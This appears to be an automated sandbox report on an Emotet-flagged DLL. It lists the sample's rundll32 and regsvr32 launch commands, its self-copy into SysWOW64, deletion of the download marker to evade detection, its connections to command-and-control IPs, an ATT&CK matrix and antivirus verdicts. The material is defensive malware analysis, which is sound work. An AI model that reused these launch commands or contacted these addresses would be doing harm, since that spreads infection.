                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10012514 appears 40 times
                      Source: l2sFDHB0lp.dllStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: l2sFDHB0lp.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: l2sFDHB0lp.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: l2sFDHB0lp.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: l2sFDHB0lp.dllVirustotal: Detection: 64%
                      Source: l2sFDHB0lp.dllReversingLabs: Detection: 68%
                      Source: l2sFDHB0lp.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\l2sFDHB0lp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllUnregisterServerr
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\l2sFDHB0lp.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllUnregisterServerrJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz"Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@18/2@0/59
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D49941 CreateToolhelp32Snapshot,6_2_04D49941
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10006120 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,2_2_10006120
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_CURSOR
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_BITMAP
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_ICON
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_MENU
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_DIALOG
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_STRING
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_ACCELERATOR
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_GROUP_ICON
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010B20 push eax; ret 2_2_10010B34
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010B20 push eax; ret 2_2_10010B5C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10011BF0 push eax; ret 2_2_10011C0E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001254F push ecx; ret 2_2_1001255F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010B20 push eax; ret 3_2_10010B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010B20 push eax; ret 3_2_10010B5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10011BF0 push eax; ret 3_2_10011C0E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001254F push ecx; ret 3_2_1001255F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E210BB push ebx; ret 4_2_00E210C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2179E push ds; retf 4_2_00E2179F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D310BB push ebx; ret 6_2_04D310C6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3179E push ds; retf 6_2_04D3179F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10025CEC __EH_prolog,LoadLibraryA,GetProcAddress,2_2_10025CEC
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\l2sFDHB0lp.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exePE file moved: C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhzJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Brfwiueuvyuxb\wegmuixkmip.qwo:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Zauszwyfobkk\vwar.kzf:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,2_2_10007AE5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,3_2_10007AE5
                      Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2316Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 2.4 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.7 %
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010839 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,2_2_10010839
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_1002592C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,3_2_1002592C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D31B61 FindFirstFileW,6_2_04D31B61
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-20230
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-20319
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 0000000C.00000002.896718470.000001D10C802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000016.00000002.683113383.00000228C5088000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.683249277.00000228C50EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000C.00000002.896783916.000001D10C828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10025CEC __EH_prolog,LoadLibraryA,GetProcAddress,2_2_10025CEC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10005260 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,2_2_10005260
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 70.36.102.35 443Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.76.89 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 92.240.254.110 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,2_2_10001090
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,2_2_100348C4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,2_2_1001A444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_10001090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,3_2_100348C4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_1001A444
                      Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10011075 GetSystemTimeAsFileTime,__aulldiv,2_2_10011075
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10018E14 __lock,_strlen,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,2_2_10018E14
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10001100 GetVersionExA,InterlockedExchange,2_2_10001100

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 4.2.rundll32.exe.e20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.dd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.3190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.eb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.4d30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.41d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.3190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e50000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4870000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.388750186.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.896680035.0000000003190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.387530383.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.387558358.0000000004201000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.384161260.0000000004871000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium1
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                      Process Injection                      		2
                      Obfuscated Files or Information                      		LSASS Memory2
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Input Capture                      		Exfiltration Over Bluetooth12
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                      DLL Side-Loading                      		Security Account Manager26
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Standard Port                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      File Deletion                      		NTDS1
                      Query Registry                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                      Masquerading                      		LSA Secrets21
                      Security Software Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials2
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                      Process Injection                      		DCSync2
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Hidden Files and Directories                      		Proc Filesystem1
                      Application Window Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Regsvr32                      		/etc/passwd and /etc/shadow1
                      Remote System Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      Rundll32                      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 632747 Sample: l2sFDHB0lp Startdate: 24/05/2022 Architecture: WINDOWS Score: 100 32 129.232.188.93 xneeloZA South Africa 2->32 34 185.8.212.130 UZINFOCOMUZ Uzbekistan 2->34 36 53 other IPs or domains 2->36 48 Snort IDS alert for network traffic 2->48 50 Found malware configuration 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 4 other signatures 2->54 8 loaddll32.exe 1 2->8         started        10 svchost.exe 1 2->10         started        13 svchost.exe 2->13         started        15 3 other processes 2->15 signatures3 process4 dnsIp5 17 regsvr32.exe 5 8->17         started        20 cmd.exe 1 8->20         started        22 rundll32.exe 2 8->22         started        24 rundll32.exe 8->24         started        38 192.168.2.1 unknown unknown 10->38 process6 signatures7 46 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->46 26 regsvr32.exe 17->26         started        30 rundll32.exe 2 20->30         started        process8 dnsIp9 40 70.36.102.35, 443, 49772, 49773 PERFECT-INTERNATIONALUS United States 26->40 42 51.91.76.89, 49785, 8080 OVHFR France 26->42 44 92.240.254.110, 8080 LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSK Slovakia (SLOVAK Republic) 26->44 56 System process connects to network (likely due to code injection or exploit) 26->56 58 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->58 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      l2sFDHB0lp.dll65%VirustotalBrowse
                      l2sFDHB0lp.dll68%ReversingLabsWin32.Trojan.Emotet
                      l2sFDHB0lp.dll100%AviraTR/AD.Nekark.bnwrm
                      l2sFDHB0lp.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.rundll32.exe.dd0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      3.2.rundll32.exe.eb0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.3190000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.4d30000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.2.rundll32.exe.e50000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.regsvr32.exe.4200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.regsvr32.exe.41d0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      5.2.rundll32.exe.e20000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      3.2.rundll32.exe.4870000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.e20000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      windowsupdatebg.s.llnwi.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      windowsupdatebg.s.llnwi.net
                      		95.140.236.128
                      		truefalseunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.ver)svchost.exe, 00000016.00000002.683376230.00000228C5900000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000016.00000003.662945656.00000228C599A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://help.disneyplus.com.svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://support.hotspotshield.com/svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.hotspotshield.com/terms/svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.pango.co/privacysvchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://disneyplus.com/legal.svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          217.182.25.250
                          		unknownFrance
                          		16276OVHFRtrue
                          151.106.112.196
                          		unknownGermany
                          		61157PLUSSERVER-ASN1DEtrue
                          79.172.212.216
                          		unknownHungary
                          		61998SZERVERPLEXHUtrue
                          110.232.117.186
                          		unknownAustralia
                          		56038RACKCORP-APRackCorpAUtrue
                          51.254.140.238
                          		unknownFrance
                          		16276OVHFRtrue
                          195.201.151.129
                          		unknownGermany
                          		24940HETZNER-ASDEtrue
                          206.188.212.92
                          		unknownUnited States
                          		55002DEFENSE-NETUStrue
                          45.118.115.99
                          		unknownIndonesia
                          		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                          209.126.98.206
                          		unknownUnited States
